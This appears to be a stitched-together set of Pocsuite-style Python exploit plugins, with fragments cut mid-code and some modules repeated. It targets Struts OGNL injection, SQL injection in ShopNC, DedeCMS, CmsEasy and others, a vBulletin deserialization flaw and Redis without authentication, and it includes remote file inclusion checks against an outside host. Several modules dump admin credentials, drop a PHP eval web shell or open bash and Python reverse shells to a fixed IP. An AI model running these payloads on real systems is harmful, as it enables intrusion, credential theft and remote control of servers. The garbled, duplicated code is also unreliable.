appName = 'struts'
appVersion = 'struts'
appPowerLink = 'struts'
samples = ['']
def _attack(self):
'''attack mode'''
return self._verify()
def _verify(self):
'''verify mode'''
result = {}
self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}"
resp = req.post(self.url,headers = self.headers)
if resp and resp.text and resp.status_code == 200:
if "bey0nd" in resp.text:
result['FileInfo'] = {}
result['FileInfo']['Filename'] = "bey0nd"
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Failed')
return output
register(Struts45POC)
result = {}
url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(ShopNCPOC)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/eventcal/mod_eventcal.php?lm_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Limbo_CMS_Module_event_Remote_File_Include)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Joomla_Kochsuite_Component_Remote_File_Include)
phpinfo can be via. that will be leak server's information.
'''
# the sample sites for examine
samples = ['']
def _attack(self):
response = req.get(self.url, headers={"referer": self.url}, timeout=10)
return self.parse_attack(response)
def _verify(self):
result = {}
head = {
'referer':self.url
}
respon = req.get(self.url, headers=head, timeout=10)
if respon.status_code == 200 and 'PHP Version' in respon.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
register(PhpinfoPOC)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result[0][1:]
result['AdminInfo']['Password'] = match_result[1][1:]
return self.parse_attack(result)
def _verify(self):
result = {}
vul_url = urlparse.urljoin(self.url, '/akcms_keyword.php?sid=11111')
payload = "'md5(0x2333333),1,1,1) -- a"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
res = req.get(vul_url.join(payload))
if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(ShopNCPOC)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/admin/install.php?l=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(McNews_Remote_File_Include)
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/code/error.php?path_prefix=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(GrayCMS_Remote_File_Include)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/modules/city.get/city.get.php?ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Insky_CMS_Remote_File_Include)
def _attack(self):
result = {}
sessionid = self.common()
if sessionid:
token = hashlib.new('md5', randomStr()).hexdigest()
payload = '<script>alert("%s")</script>' % token
req.get(self.url + "/escform.esp?sessionid=" + sessionid + "&formid=131&opmsg=" + payload).content
response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=257").content
if token in response:
result['VerifyInfo'] = {}
result['XSSInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['XSSInfo']['Payload'] = payload
response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=259").content #ɾ³ýÏûÏ¢
response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=11").content #Í˳öµÇ¼
return self.parse_result(result)
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(ESC_Data_Controller_Privilege_Escalation)
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
"floor(rand(0)*2),(select md5(233)))a from "
"information_schema.tables group by a)b),"
"'','','','1','127.0.0.1','2') #"
}
# 使用 requests 发送 post 请求
response = req.post(target, data=post_data, timeout=10)
content = response.content
# 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值
if 'e165421110ba03099a1c0393373c5b43' in content:
result = {'VerifyInfo': {}}
result['VerifyInfo']['URL'] = target
return self.parse_result(result)
def _attack(self):
return self._verify()
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
register(CmsEasyPoC)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/portfolio/msg/view.php?av=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Cyberfolio_Remote_File_Include)
"1',(SELECT 1 FROM (select count(*),concat("
"floor(rand(0)*2),(select md5(233)))a from "
"information_schema.tables group by a)b),"
"'','','','1','127.0.0.1','2') #"
}
# 使用 requests 发送 post 请求
response = req.post(target, data=post_data, timeout=10)
content = response.content
# 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值
if 'e165421110ba03099a1c0393373c5b43' in content:
result = {'VerifyInfo': {}}
result['VerifyInfo']['URL'] = target
return self.parse_result(result)
def _attack(self):
return self._verify()
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
register(CmsEasyPoC)
img_url = self.upload_image()
payload = '300x300||echo%20PD9waHAgZXZhbCgkX1BPU1RbZV0pOz8%2b|base64%20-d%20%3E%20Uan1wS.php%20%23'
sess = req.Session()
sess.headers.update(self.headers)
sess.get(img_url.replace('300x300', payload))
#get shell
resp = req.post('%s/Uan1wS.php' % self.url, data={'e': 'echo strrev(dfgniqsfc);'}).content
if 'cfsqingfd' in resp:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = '%s/Uan1wS.php' % self.url
result['ShellInfo']['Content'] = 'e'
return self.parse_attack(result)
def _verify(self):
return self._attack()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
award = re.search('</i>[\s\S]+?([\d\.]+kB)[\s\S]+?</td>' , raw[amount_of_raws]).group(1)
total = total + 1
print '\n'
print str(total) + '.'
print author
print time
print type
print vid
print title
print award
print '\n'
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
print 'total:' , total
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(showSeebugSubmission)
vulType = 'Database Found'
desc = 'Angelo-Emlak在web根目录下保存敏感信息,但缺乏足够的访问控制,远程攻击者可以通过直接向veribaze/angelo.mdb发出请求,下载数据库。'
samples = ['http://burdurdaemlak.com']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/veribaze/angelo.mdb' % self.url
response = req.get(vul_url).content
if re.search('Standard Jet DB', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Angelo_emlak_Database_Found)
def _verify(self):
'''verify mode'''
result = {}
import socket
s = socket.socket()
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
socket.setdefaulttimeout(5)
host = url2ip(self.url)
port = 6379
s.connect((host, port))
s.send(payload)
recvdata = s.recv(1024)
if recvdata and 'redis_version' in recvdata:
result['FileInfo'] = {}
result['FileInfo']['Filename'] = "redis-unauth"
s.close()
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Failed')
return output
register(RedisunauthPOC)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/pop.php?base=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(MyABraCaDaWeb_Remote_File_Include)
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/epal/index.php?view=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(AlstraSoft_EPay_Pro_Remote_File_Include)
vulType = 'Remote File Inclusion'
desc = 'phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit'
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/index.php?section=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(JASmine_News_Remote_File_Include)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://tool.scanv.com/wsl/php_verify.txt?]' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(interact_Remote_File_Include)
appPowerLink = 'axublog'
samples = ['']
def _attack(self):
'''attack mode'''
return self._verify()
def _verify(self):
'''verify mode'''
result = {}
payurl = "hit.php?g=arthit&id=-1 +%55NION+ALL+%53ELECT+1,2,3,4,5,6,md5(1),8,9,10,11,12 from axublog_adusers"
resp = req.get(self.url + payurl)
print resp.text
if resp and resp.text and resp.status_code == 200:
if "c4ca4238a0b923820dcc509a6f75849b" in resp.text:
result['AdminInfo'] = {}
result['AdminInfo'][
'Password'] = "******"
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Failed')
return output
register(AxublogPOC)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(dotWidget_CMS_Remote_File_Include)
resp1 = req.post(shell_url, data=verify_payload)
if resp1.status_code == 200 and "840c3eda3ea42ecd90aeb3434f3510b7" in resp1.content:
result['shellURL'] = shell_url + " password: a"
return self.parse_attack(result)
return self.parse_attack(result)
def _verify(self):
result = {}
payload = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A18%3A%22vB_Database_MySQLi%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A13%3A%22print+md5%281%29%3B%22%3B%7D"
vulurl = urlparse.urljoin(
self.url, '/ajax/api/hook/decodeArguments?arguments=%s' % payload)
print vulurl
resp = req.get(vulurl)
if resp.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in resp.content:
result["VerifyInfo"] = {}
result["VerifyInfo"]['URL'] = vulurl
result["VerifyInfo"]["Payload"] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("Internet nothing returned")
return output
register(vB5_RCE)
class EduwindPOC(POCBase):
vulID = '90650' # ssvid
version = '1'
author = ['Dubuqingfeng']
vulDate = '2016-01-13'
createDate = '2016-02-03'
updateDate = '2016-02-03'
references = ['http://www.sebug.net/vuldb/ssvid-90650']
name = '_90650_shopnc_2008_place_sql_inj_PoC'
appPowerLink = 'http://www.phpcms.cn'
appName = 'Eduwind'
appVersion = '2008'
vulType = 'SQL Injection'
desc = '''
phpcms 2008 中广告模块,存在参数过滤不严,
导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,
如果关闭了错误显示,可以采用基于时间和错误的盲注
'''
samples = ['http://10.1.200.28/']
@require_header('cookie')
def _attack(self):
result = {}
url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200:
match_result = re.findall(r'~\w*', res.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result[0][1:]
result['AdminInfo']['Password'] = match_result[1][1:]
return self.parse_attack(result)
@require_header('cookie')
def _verify(self):
result = {}
# 定义地址
vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic')
logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout')
login_url = urlparse.urljoin(self.url, '/index.php?r=u/login')
admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site')
# 提升管理员权限Payload
payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0="
headers = {"Content-Type": "application/x-www-form-urlencoded"}
email = raw_input("Email: ")
password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>')
if find_result != -1:
# 获取cookie
cookies = admin_result.cookies
# 发送post请求
get_shell_result = req.post(admin_url, cookies=cookies, headers=headers)
print cookies
print get_shell_result.content
print get_shell_result.cookies
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Postdata'] = payload
return self.parse_attack(result)
def do_login(self):
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(EduwindPOC)
payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'}
response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# 方法二 new bash Code
# payload = {'ip': '127.0.0.1;echo "#\!/bin/bash\n\nbash -i >& /dev/tcp/192.168.1.55/8888 0>&1">shell.sh && ./shell.sh', 'Submit': 'Submit'}
# response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# 方法三 Python Shell 貌似这方法只适合手动跑
# payload = {
# 'ip' : '127.0.0.1;python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.1.55\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"&',
# 'Submit': 'Submit'}
# response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
result['extra'] = {}
result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' "
return self.parse_output(result)
def _attack( self ):
return self._verify()
def parse_output( self, result ):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Error')
return output
register(TestPoc)
Content-Length: 171
Cookie: access_token=a049bd87-d8c6-4756-aa6a-46a357a8de36;
Content-Type: multipart/form-data; boundary=1c88e9afa73c438d93b5043a7096b207
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
--1c88e9afa73c438d93b5043a7096b207
Content-Disposition: form-data; name="image1"; filename="%{{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test-{randint1}','bey0nd')}}'\x00b"
Content-Type: text/plain
--1c88e9afa73c438d93b5043a7096b207--
""".format(uri=uri, randint1=str(randint1))
code, head, html, redir, log = curl.http(arg, raw=raw)
# print head
if code != 0 and "X-Test-%s" % str(randint1) in head:
return True
else:
return False
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Failed')
return output
register(Struts46POC)
if data != None:
result = {'VerifyInfo': {}}
result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)
def _attack(self):
result = {}
target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
response = req.get(target)
content = response.content
regex = re.compile('<h2>.*?\|(.*?)</h2>')
data = regex.search(content)
if data != None:
string = data.groups()
result = {'VerifyInfo': {}}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['data'] = string
return self.parse_result(result)
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("Internet Nothing returned")
return output
register(Fuckdede)
All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk.
'''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self, verify=True):
result = {}
vul_url = '%s/api/wlan/security-settings' % (self.url)
response = req.get(vul_url).content
if re.search('<WifiWpapsk>', response) and re.search('<WifiWpaencryptionmodes>', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Huawei_E5331_Unauthorized_access)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Mambo_cropimage_Component_Remote_File_Include)
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/includes/tgpinc.php?DOCUMENT_ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(GnatTGP_Remote_File_Include)
result = {}
target = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
response = req.get(target)
content = response.content
if 'DedeCMS Error Warning!' in content:
result = {'VerifyInfo':{}}
result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)
def _attack(self):
return self._verify()
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("Internet Nothing returned")
return output
register(Fuckdede)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/genpage-cgi.php?REP_INC=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(Hitweb_Remote_File_Include)
parttern = '\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=80)
#检查是否含有特征字符串
if '$~~~$' in resp.content:
#提取信息
match = re.search(parttern, resp.content, re.M | re.I)
if match:
#漏洞利用成功
result['DbInfo'] = {}
#数据库用户名
result['DbInfo']['Username'] = match.group(1)
#数据库版本
result['DbInfo']['Version'] = match.group(2)
return self.parse_output(result)
def _verify(self):
return self._attack()
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
response = req.get(vul_url).content
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(FlatNuke_Remote_File_Include)
